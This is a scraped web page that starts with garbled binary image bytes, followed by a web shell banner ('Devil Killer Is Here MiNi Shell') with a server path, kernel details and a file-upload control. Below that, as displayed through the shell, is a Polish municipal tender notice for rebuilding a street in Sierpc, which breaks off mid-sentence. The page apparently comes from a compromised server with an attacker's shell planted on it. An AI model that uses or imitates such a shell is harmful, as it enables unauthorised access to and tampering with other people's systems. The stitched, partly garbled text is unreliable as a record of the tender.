JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210630/0010000701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00100007 z dnia 2021-06-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ul. Mieszka I w Sierpcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015483</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piastowska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48(24)2758654</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">r.goszczycki@um.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.sierpc.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ul. Mieszka I w Sierpcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d196cca1-d59b-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00100007</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008647/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa ul. Mieszka I w Sierpcu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umsierpc.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umsierpc.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://umsierpc.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. KTO JEST ADMINISTRATOREM DANYCH?<br/>Zgodnie z ogólnym rozporządzeniem o ochronie danych (RODO), administratorem Państwa danych<br/>osobowych jest Gmina Miasto Sierpc (ul. Piastowska 11a, 09-200 Sierpc) (Administrator) jako<br/>zamawiający. Kontakt z Administratorem: +48 24 275 86 86, info@sierpc.pl.<br/>Administrator jest odpowiedzialny za bezpieczeństwo przekazanych danych osobowych oraz<br/>przetwarzanie ich zgodnie z przepisami prawa.<br/>[Szczegółowa klauzula informacyjna RODO- ze względu na ograniczoną ilość znaków- została<br/>określona w Rozdziale XXIII SWZ]</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIF.271.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja robót budowlanych w ramach zadania inwestycyjnego pn. „Przebudowa ul. Mieszka I w Sierpcu”.<br/>2.	W ramach kosztów kwalifikowalnych przewiduje się wykonanie m.in. następujących robót:<br/>1)	Wykonanie robót budowlanych w ramach przebudowy ulicy Mieszka I, w tym:<br/>	- budowa jezdni dwupasowej, dwukierunkowej o nawierzchni podatnej z betonu asfaltowego KR1 o szer. 5,0 m (2 pasy ruchu po 2,5 m), klasy L (lokalna) o długości 735 m wraz z obramowaniem krawężnikami betonowymi,<br/>	- budowa chodników z kostki betonowej po lewej stronie jezdni o szer. 2,0 m,<br/>	- budowa zjazdów indywidualnych z kostki betonowej,<br/>	- budowa zjazdów publicznych z kostki betonowej,<br/>	- budowa 5 progów zwalniających płytowych z kostki betonowej,<br/>	- budowa skrzyżowania ulic Mieszka I – Władysława I Hermana – Stanisława Staszica, skanalizowanego typu rondo o średnicy zewnętrznej 11,0 m, z wyspą środkową przejezdną o średnicy zewnętrznej 6,0 m i odcinkami dojazdowymi do przedmiotowego ronda tj.: odcinek ul. Władysława I Hermana od km 0+000,00 do km 0+030,00 oraz ul. Stanisława Staszica od km 0+000,00 do km 0+046,00,<br/>	- budowa instalacji oświetlenia ulicznego ronda za pomocą 8 szt. opraw ulicznych o mocy 100W na słupach 9m z wysięgnikami o długości 1,5m, na prefabrykowanych fundamentach, ułożeniem 200 m kabli YAKXS-żo 5x35 mm2, <br/>	- budowa sieci kanalizacji deszczowej w ul. Mieszka I, ul. Władysława I Hermana i ul. Stanisława Staszica odprowadzającej wody opadowe i roztopowe z utwardzonych nawierzchni projektowanych ulic z rur PP o średnicy w zakresie<br/>	φ 315 mm do φ800 z rur PP SN8 łączonych na wcisk i uszczelkę,<br/>	- wykonanie oznakowania poziomego i pionowego.<br/>2)	Wykonanie robót budowlanych w ramach przebudowy skrzyżowania drogi wojewódzkiej nr 541 (ul. Piastowska) z ul. Mieszka I w Sierpcu (odc. DW nr 541 od km 89+371,00 do km 89+549,30), w tym:<br/>	- wykonanie robót rozbiórkowych związanych z likwidacją istniejącego wlotu skrzyżowania ul. Mieszka I do DW nr 541 (ul. Piastowska),<br/>	- wykonanie wlotu skrzyżowania ul. Mieszka I w km 89+458 i poszerzeń jezdni DW nr 541 o nawierzchni podatnej z betonu asfaltowego KR4 wraz z obramowaniami,<br/>	- likwidacją istniejącego rowu przydrożnego,<br/>	- rozbudowę przykanalika sieci kanalizacji deszczowej DN400 w km 89+408,80, która obejmuje rozbiórkę istniejącej studzienki ściekowej, przedłużeniem istniejącego przykanalika z rur PP DN200 SN8 i wykonaniem nowej studzienki ściekowej z osadnikiem<br/>	- wykonanie oznakowania poziomego i pionowego, wraz z urządzeniami bezpieczeństwa ruchu drogowego.<br/><br/>3.	W ramach kosztów niekwalifikowalnych: <br/>1)	Wykonanie robót budowlanych w ramach przebudowy ul. Władysława I Hermana od km 0+030,00 do km 0+143,30, w tym:<br/>	- budowa jezdni dwupasowej, dwukierunkowej o nawierzchni podatnej z betonu asfaltowego KR1 o szer. 6,0 m (2 pasy ruchu po 3,0 m) o długości 113,30 m wraz z obramowaniem krawężnikami betonowymi,<br/>	- budowa chodników z kostki betonowej po lewej stronie jezdni o szer. 2,0 m,<br/>	- budowa zjazdów indywidualnych z kostki betonowej,<br/>	- budowa zjazdów publicznych z kostki betonowej,<br/>	- budową sieci kanalizacji deszczowej z rur PP SN8 o średnicy DN500 o dług. 17,0 m łączonych na wcisk i uszczelkę, z rur PP SN8 o średnicy DN400 o dług. 135,50 m łączonych na wcisk i uszczelkę wraz z montażem osadnika wg KPED 01.14 na wylocie z rowu przydrożnego,<br/>	- budowa instalacji oświetlenia ulicznego, w tym m.in. ułożenie kabla YAKXS-żo 5x35 mm2 o dług. 50,0 m, ułożeniem rur osłonowych DVK 110, montaż szafki oświetleniowej termoutwardzalnej na prefabrykowanym fundamencie,<br/>	- wykonanie oznakowania poziomego i pionowego, wraz z urządzeniami bezpieczeństwa ruchu drogowego.<br/>2)	Wykonanie robót budowlanych w ramach przebudowy ul. Stanisława Staszica od Staszica od km 0+046,00 do km 0+130,64, w tym:<br/>	- wykonanie robót rozbiórkowych istniejącej nawierzchni bitumicznej i chodników z kostki betonowej,<br/>	- budowa jezdni dwupasowej, dwukierunkowej o nawierzchni podatnej z betonu asfaltowego KR1 o szer. 6,0 m (2 pasy ruchu po 3,0 m) i poszerzeniem do 7,4 m na łuku poziomym, o długości 84,64 m wraz z obramowaniem krawężnikami betonowymi,<br/>	- budowa chodników z kostki betonowej po lewej stronie jezdni o szer. 2,0 m,<br/>	- budowa zjazdu indywidualnego z kostki betonowej,<br/>	- budowa sieci kanalizacji deszczowej z rur PP o średnicy w zakresie φ800 o dług. 83,70 m z rur PP SN8 łączonych na wcisk i uszczelkę, ułożeniem kanału tłocznego z rur PE500 o dług. 9,0 m, wraz z budową przepompowni wód deszczowych DN6000 z elementów betonowych, prefabrykowanych „łupinowych”,<br/> wykonanie oznakowania poziomego i pionowego, wraz z urządzeniami bezpieczeństwa ruchu drogowego. <br/>	wykonanie oznakowania pionowego - TABLICA INFORMACYJNA, zgodnie z wytycznymi i wzorem:<br/>• Tablicę wykonuje się z płyty kompozytowej, tworzywa sztucznego pleksi lub PCV o grubości minimum 3 mm albo umieszcza na podkładzie metalowym z podwójnie zawiniętą krawędzią.<br/>• treść tablicy zostanie przekazana Wykonawcy po podpisaniu umowy.<br/>• podczas realizacji zadania w zakresie infrastruktury drogowej, kolejowej, morskiej, wodnej śródlądowej, lotniczej, telekomunikacyjnej, teleinformatycznej, cyfrowej, przesyłowej lub komunalnej wykonuje się tablicę informacyjną o wymiarach 180 × 120 cm.<br/>4.	Szczegółowo przedmiot zamówienia opisują następujące dokumenty:<br/>1)	projekt budowlany i wykonawczy;<br/>2)	Specyfikacje Techniczne Wykonania i Odbioru Robót;<br/>3)	przedmiar robót.<br/>5.	Zamawiający zaleca przeprowadzenie wizji lokalnej.<br/>6.	Zamawiający wymaga, aby wynagrodzenie za pracę osób zatrudnionych na podstawie umowy o pracę nie było niższe od obowiązującej wysokości wynagrodzenia minimalnego, ustalonej na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę.<br/>7.	Wykonawca i jego podwykonawcy zobowiązani są do uzyskania zgody od pracowników na przetwarzanie danych osobowych zgodnie z przepisami o ochronie danych osobowych.<br/>8.	Termin gwarancji:<br/>	Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonane roboty i zamontowane urządzenia w rozumieniu art. 577 Kodeksu cywilnego, która stanowi rozszerzenie odpowiedzialności Wykonawcy z tytułu rękojmi za wady;<br/>	okres udzielonej gwarancji jakości będzie jednym z kryteriów oceny ofert. Wykonawca będzie mógł zaoferować gwarancję w latach, na okres od 5 (gwarancja minimalna) do 7 (gwarancja maksymalna) lat.<br/>	Uprawnienia z tytułu rękojmi przysługują Zamawiającemu przez okres 5 (pięciu) lat.<br/>9.	Na podstawie art. 95 ust. 1 ustawy Pzp, w związku z art. 438 ustawy Pzp, Zamawiający wymaga aby Wykonawca lub Podwykonawca zatrudniał na podstawie umowy o pracę (w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy), osoby wykonujące czynności w zakresie realizacji zamówienia, tj. 1 osoba na stanowisku operatora koparki.<br/>10.	W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności weryfikacyjnych i kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w ust. 8 czynności. Zamawiający uprawniony jest do:<br/>1)	żądania oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności w związku z realizacją zamówienia, określającego liczbę osób zatrudnionych na podstawie umowy o pracę, rodzaje umów o pracę i wymiary etatów;<br/>2)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów;<br/>3)	przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>11.	Z tytułu niespełnienia żądania określonego w ust. 9 pkt 1 Zamawiający naliczy kary umowne, określone w § 7 ust. 1 pkt 9 Umowy.<br/>12.	Zamawiający wymaga, aby wynagrodzenie za pracę osób zatrudnionych na podstawie umowy o pracę nie było niższe od obowiązującej wysokości wynagrodzenia minimalnego, ustalonej na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę.<br/>13.	Wykonawca i jego podwykonawcy zobowiązani są do uzyskania zgody od pracowników na przetwarzanie danych osobowych zgodnie z przepisami o ochronie danych osobowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający kierował się będzie kryteriami: 1) Cena (z VAT): 60%,<br/>2) Gwarancja: 40%.<br/>2. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką może osiągnąć oferta wynosi 100.<br/>Punkty będą przyznawane według następujących zasad:<br/>1) Kryterium nr 1: Cena (60%) „C”, obliczona zostanie na postawie następującego wzoru:<br/>C= C_(min.)/C_o ×100 pkt= ...pkt,gdzie:<br/>Cmin. – cena oferty najtańszej (brutto)<br/>Co – cena oferty ocenianej (brutto)<br/>(maksymalnie 100 pkt do zdobycia)<br/>2) Kryterium nr 2: Gwarancja (40%).<br/>Kryterium „Gwarancja” G- będzie rozpatrywane na podstawie okresu gwarancji jakości na roboty objęte<br/>przedmiotem zamówienia, podanej przez Wykonawcę w formularzu Oferty. Najkrótszy możliwy okres<br/>gwarancji jakości wymagany przez Zamawiającego (warunek konieczny) – 5 lat.<br/>Najdłuższy możliwy okres gwarancji jakości uwzględniony do oceny przez Zamawiającego – 7 lat.<br/>Termin gwarancji należy proponować w pełnych latach.<br/>Zamawiający przyzna punkty w następujący sposób:<br/>5 lat – 0 punktów;<br/>6 lat - 50 punktów;<br/>7 lat - 100 punktów;<br/>(maksymalnie 100 pkt do zdobycia)<br/>UWAGA:<br/>W przypadku nieokreślenia w formularzu ofertowym Kryterium nr 2, tj. „Gwarancja”, Zamawiający<br/>przyjmie gwarancję minimalną, tj. 5 lat i przyzna 0 pkt. W przedmiotowym kryterium.<br/>3. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę<br/>punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej danego kryterium,<br/>obliczonych wg wzoru:<br/>P=C ×60% +G ×40%= ...pkt,gdzie:<br/>P – łączna liczba punktów przyznana ofercie ocenianej,<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Gwarancja”.<br/>4. Łączna suma punktów przyznanych będzie zaokrąglana do dwóch miejsc po przecinku lub z większą<br/>dokładnością pozwalającą na wybór oferty o największej liczbie punków, jeżeli przy zastosowaniu<br/>wymienionego zaokrąglenia nie występuje różnica w ilości przyznanych punktów wynikająca z małej<br/>różnicy zaoferowanych cen.<br/>5. Zamawiający udzieli zamówienia publicznego na cały przedmiot zamówienia, temu z<br/>niewykluczonych z postępowania Wykonawców, którego oferta w toku oceny ofert nie zostanie<br/>odrzucona i zostanie uznana za najkorzystniejszą, tzn. otrzyma największą łączną sumę punków.<br/>6. Zgodnie z art. 223 ust. 2 ustawy Pzp, Zamawiający poprawi w ofercie oczywiste omyłki pisarskie,<br/>oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,<br/>inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych<br/>zmian w treści oferty, niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została<br/>poprawiona. Jeżeli cena jednostkowa podana liczbą nie odpowiada cenie podanej słownie, przyjmuje<br/>się za prawidłową cenę jednostkową podaną liczbą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp tj.: <br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie precyzuje w tym zakresie szczególnych wymagań;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów: Zamawiający nie precyzuje w tym zakresie szczególnych wymagań ;<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie precyzuje w tym zakresie szczególnych wymagań ; <br/>4)	zdolności technicznej lub zawodowej: Zamawiający wymaga:<br/>a) złożenia przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu;<br/>b) aby Wykonawca wykazał, że wykonał nie wcześniej niż w okresie ostatnich 5 lat, przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie (w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane – Dz. U. z 2020 r. poz. 1333 z późn. zm.) drogi wraz z siecią kanalizacji deszczowej lub siecią kanalizacji sanitarnej o łącznej wartości nie niższej niż 2 000 000,00 zł brutto.<br/>c) aby Wykonawca dysponował co najmniej jedną osobą do kierowania robotami w specjalności drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie Zamawiającego Wykonawca zobowiązany jest złożyć następujące podmiotowe środki dowodowe:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty 